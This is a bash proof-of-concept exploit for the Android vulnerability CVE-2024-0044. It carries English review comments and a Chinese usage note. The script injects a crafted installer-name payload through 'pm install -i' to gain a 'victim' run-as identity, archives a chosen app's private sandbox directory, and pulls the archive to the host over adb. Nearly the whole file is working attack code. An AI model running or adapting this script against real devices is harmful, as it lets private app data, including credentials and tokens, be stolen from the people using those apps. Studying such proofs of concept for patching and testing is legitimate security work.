#!/bin/bash
# Proof-of-concept for CVE-2024-0044 (Android): uses `pm install -i` with a crafted
# installer-name string to obtain a "victim" identity via run-as and copy another
# app's private data directory off the device as a tar archive.
#
# Usage:   ./CVE-2024-0044.sh <apk_path> <package_name>
#   <apk_path>      path to any local APK file (its content is irrelevant to the bug)
#   <package_name>  package name of the app whose sandbox directory is archived
# Example: ./CVE-2024-0044.sh /path/to/target.apk com.target.mobile
#
# Requires a device reachable via `adb` with shell access. Device-side artifacts
# created by this script: /data/local/tmp/tempqazmkp/ (plus any.apk and
# <package>.tar inside it); the directory is removed at the end.
: <<'EOF'
利用 CVE-2024-0044 Android 权限提升下载任意目标App沙箱文件。
author by Re13orn
用法:
./CVE-2024-0044.sh <apk_path> <package_name>
参数:
<apk_path> 任意一个本地 APK 文件的路径
<package_name> 应用包名
示例:
./CVE-2024-0044.sh /path/to/target.apk com.target.mobile
EOF
# Positional arguments (no further validation beyond the emptiness check below).
APK_PATH=$1
PACKAGE_NAME=$2
# Both arguments are mandatory; print usage and exit 1 otherwise.
if [ -z "$APK_PATH" ] || [ -z "$PACKAGE_NAME" ]; then
echo "Usage: $0 <any_apk_path> <target_package_name>"
exit 1
fi
# Create the working directory on the device, pre-create the output tar and make
# the whole directory world-writable (0777) so the later run-as context can write it.
adb shell "mkdir -p /data/local/tmp/tempqazmkp/ && touch /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar && chmod -R 0777 /data/local/tmp/tempqazmkp/"
# Push the arbitrary APK to the device as any.apk (NB: $APK_PATH is expanded unquoted here).
adb push $APK_PATH /data/local/tmp/tempqazmkp/any.apk
# Look up the numeric uid of the target package from `pm list packages -U`.
# The grep is an unanchored substring match, so more than one line may be captured
# if the name is a prefix of another installed package.
PACKAGEUID=$(adb shell "pm list packages -U | grep $PACKAGE_NAME" | awk -F 'uid:' '{print $2}')
# Multi-line installer-name string passed to `pm install -i` below; it embeds the
# target uid. This crafted string is the core of the CVE-2024-0044 trigger.
PAYLOAD="@null
victim $PACKAGEUID 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Run the install and the archive step on the device. The heredoc delimiter is unquoted,
# so $PAYLOAD and $PACKAGE_NAME are expanded on the host before being sent; `\$PAYLOAD`
# is sent literally and expanded by the device shell from the assignment on the first line.
# `run-as victim` then archives the path named by PACKAGE_NAME into the pre-created tar.
# NOTE(review): assumes run-as starts in a directory where "$PACKAGE_NAME" resolves to the
# app's data directory (the payload names /data/user/0) — confirm against the target device.
adb shell <<EOF
PAYLOAD="$PAYLOAD"
pm install -i "\$PAYLOAD" /data/local/tmp/tempqazmkp/any.apk && \
run-as victim sh -c 'tar -cf /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar $PACKAGE_NAME'
EOF
# Report the archive size. NOTE(review): `du -s` prints allocated blocks (unit depends on
# the device's du implementation), not bytes, so the "bytes" label in the message below
# is presumably inaccurate.
filesize=$(adb shell "du -s /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar" | awk '{print $1}')
echo "Downloading file: $PACKAGE_NAME.tar (size: $filesize bytes)"
# Pull the archive into the current host directory.
adb pull /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar .
# Remove the device-side working directory and everything in it (any.apk and the tar).
adb shell "rm -rf /data/local/tmp/tempqazmkp/"